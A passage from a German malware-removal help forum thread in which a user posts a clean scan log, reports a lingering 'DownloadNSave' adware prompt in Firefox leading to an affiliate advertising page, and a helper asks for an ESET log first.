Infizierte Registrierungsschlüssel: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungswerte: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung: 0
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateien: 0
(Keine bösartigen Objekte gefunden)

(Ende)

Das Problem, wenn ich über Firefox auf den Servers zugreife ist jedoch immer noch da.
Hier ist immer ein Icon blau mit folgendem Kontext: "Click to Continue > by DownloadNSave"
Wenn ich dann in diesem Fall drauf klicke, kommt folgende Werbeseite: "hxxp://www.westwing.de/lp/lp4/?mdprefid=marketing_de_af10030&utm_source=mds&utm_medium=aff&utm_campaign=standard&utm_term=de_mds_txt_0&aff=de.aff.mds.standard..de_mds_txt_001&affid =1014&affsub=101329"

mfg Thomas

cosinus · 01.11.2012, 14:31

Poste bitte erstmal das Log von ESET
Danach kümmern wir uns um den anderen Kram.

01.11.2012, 14:31	#22
cosinus /// Winkelfunktion /// TB-Süch-Tiger™	Virus, Trojaner VirTool:Win32/Injector.DM eingefangen. Lt. Microsoft ziemlich böses Ding und recht neu Poste bitte erstmal das Log von ESET Danach kümmern wir uns um den anderen Kram. __________________ Logfiles bitte immer in CODE-Tags posten

Virus, Trojaner VirTool:Win32/Injector.DM eingefangen. Lt. Microsoft ziemlich böses Ding und recht neu

Plagegeister aller Art und deren Bekämpfung: Virus, Trojaner VirTool:Win32/Injector.DM eingefangen. Lt. Microsoft ziemlich böses Ding und recht neu